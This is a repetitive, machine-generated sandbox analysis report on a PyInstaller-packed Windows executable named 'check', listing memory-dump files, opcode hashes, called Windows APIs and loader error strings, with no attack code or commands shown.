                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                          • Instruction ID: de049eba8cc11e3581a3eb5bbbbedf678ff94b9f81a08dfaa9297ee6b68452b0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1551C277A18E5182E7249F29C48023CB7A0EB45B78F648171CE4D07794EBBAE847C759
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
Memory Dump Source
• Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
• Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
Similarity
• API ID: ErrorFreeHeapLast
• String ID:
• API String ID: 485612231-0
                                                                                                                                                                                                                                          • Opcode ID: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
                                                                                                                                                                                                                                          • Instruction ID: 8ec35e2f2a220c412bfe446222eb7c0aa0477a172d05a5adadbc7c897b367bde
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5410262714E5582EF04DF2AD9A4579B3A1BB48FE0B899432EE0D97B58EE7CD046C304
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                                                                                                                                                          • Instruction ID: baff752426d368fcbf43071b284048bb05aa1fc67d55427855d756fe18a4c308
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4931C132B08F4241E764AF25688013EAAD4AF85BE0F944278EE9D53BD5EF7CD405C718
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                                                                                                                                                                                                          • Instruction ID: 7be03e24e1c39dcaaeeb4e3ef9d0a1324e3d30ddcef699101e7bf7efa19a878b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37F0C8717286918BDB989F68A44262977D0F7483D0F90D079D58C83B14CA7CC051CF14
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                                                                                                                                                                                                          • Instruction ID: e9c00fe2d22ec22345863ad67d7e79c68096085571f7a064b93ca4218f89cdca
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2AA00221E0CC0AD0E748AF04E8D0035A330FB98321BC00071E96D510B0AFFCE81CE320
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                          • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                          • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                          • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                          • Instruction ID: e71a17032375b422bd70b092f4d1c1515e37dc914e56d046513f083d25374bc6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1027124A0EF1791FA19FF69A8905B4A2A1BF48775FC450B5D82E42260FFFCA55DC230
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7124F45F4,00000000,00007FF7124F1985), ref: 00007FF7124F93C9
                                                                                                                                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(?,00007FF7124F86B7,?,?,00000000,00007FF7124F3CBB), ref: 00007FF7124F822C
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F2810: MessageBoxW.USER32 ref: 00007FF7124F28EA
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                          • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                          • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                          • Opcode ID: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                                                                                                                                                                                                          • Instruction ID: 3b7cf58a228c2d1e19451b4c90cf64fda4fda628d840dcc40df668fd5df1d9f7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08517311B2DE4281FB50FB29D8916BAE251AFD47A0FC44431DE0E4A6D5EEECE91CC760
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                          • String ID: P%
                                                                                                                                                                                                                                          • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                          • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                          • Instruction ID: fac39cf6d3b0a346d1e0cf02b35199e6441f402d3e6771e2ac713e2d202d3416
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9551F726604BA186D6349F26F4581BAF7A1F798B61F004121EFDE43694EF7CD049DB20
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                          • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                          • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                          • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                          • Instruction ID: ee9e2e3134d07c45eb671aaa4dd482b8340c80649362865455252b2ab73f1e9f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89218625B08E4281F741AF7EE984179A251FF88BB0F984271DE1D473D4EEACD999C221
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: -$:$f$p$p
                                                                                                                                                                                                                                          • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: f$f$p$p$f
                                                                                                                                                                                                                                          • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                          • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                          • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7124F3706,?,00007FF7124F3804), ref: 00007FF7124F2C9E
                                                                                                                                                                                                                                          • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7124F3706,?,00007FF7124F3804), ref: 00007FF7124F2D63
                                                                                                                                                                                                                                          • MessageBoxW.USER32 ref: 00007FF7124F2D99
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                          • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                          • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF7124FDF7A,?,?,?,00007FF7124FDC6C,?,?,?,00007FF7124FD869), ref: 00007FF7124FDD4D
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF7124FDF7A,?,?,?,00007FF7124FDC6C,?,?,?,00007FF7124FD869), ref: 00007FF7124FDD5B
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF7124FDF7A,?,?,?,00007FF7124FDC6C,?,?,?,00007FF7124FD869), ref: 00007FF7124FDD85
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF7124FDF7A,?,?,?,00007FF7124FDC6C,?,?,?,00007FF7124FD869), ref: 00007FF7124FDDF3
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF7124FDF7A,?,?,?,00007FF7124FDC6C,?,?,?,00007FF7124FD869), ref: 00007FF7124FDDFF
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF7124F351A,?,00000000,00007FF7124F3F23), ref: 00007FF7124F2AA0
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Value$ErrorLast
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                          • String ID: CONOUT$
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF7124F3FB1), ref: 00007FF7124F8EFD
                                                                                                                                                                                                                                          • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF7124F3FB1), ref: 00007FF7124F8F5A
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7124F45F4,00000000,00007FF7124F1985), ref: 00007FF7124F93C9
                                                                                                                                                                                                                                          • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF7124F3FB1), ref: 00007FF7124F8FE5
                                                                                                                                                                                                                                          • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF7124F3FB1), ref: 00007FF7124F9044
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF7124F3FB1), ref: 00007FF7124F9055
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF7124F3FB1), ref: 00007FF7124F906A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3462794448-0
                                                                                                                                                                                                                                          • Opcode ID: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                                                                                                                                                                                                          • Instruction ID: adc8a6e3b0a417fa0577f98e56296bbd16abbb8057d9067e75fff557273daad3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3241C875B19A8285EB30AF15A4402BAB394FBC4BE0F850135DF4D57B89DEBCD918CB24
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF712504F11,?,?,?,?,00007FF71250A48A,?,?,?,?,00007FF71250718F), ref: 00007FF71250B2D7
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF712504F11,?,?,?,?,00007FF71250A48A,?,?,?,?,00007FF71250718F), ref: 00007FF71250B30D
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF712504F11,?,?,?,?,00007FF71250A48A,?,?,?,?,00007FF71250718F), ref: 00007FF71250B33A
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF712504F11,?,?,?,?,00007FF71250A48A,?,?,?,?,00007FF71250718F), ref: 00007FF71250B34B
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF712504F11,?,?,?,?,00007FF71250A48A,?,?,?,?,00007FF71250718F), ref: 00007FF71250B35C
                                                                                                                                                                                                                                          • SetLastError.KERNEL32(?,?,?,00007FF712504F11,?,?,?,?,00007FF71250A48A,?,?,?,?,00007FF71250718F), ref: 00007FF71250B377
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Value$ErrorLast
                                                                                                                                                                                                                                          • String ID:
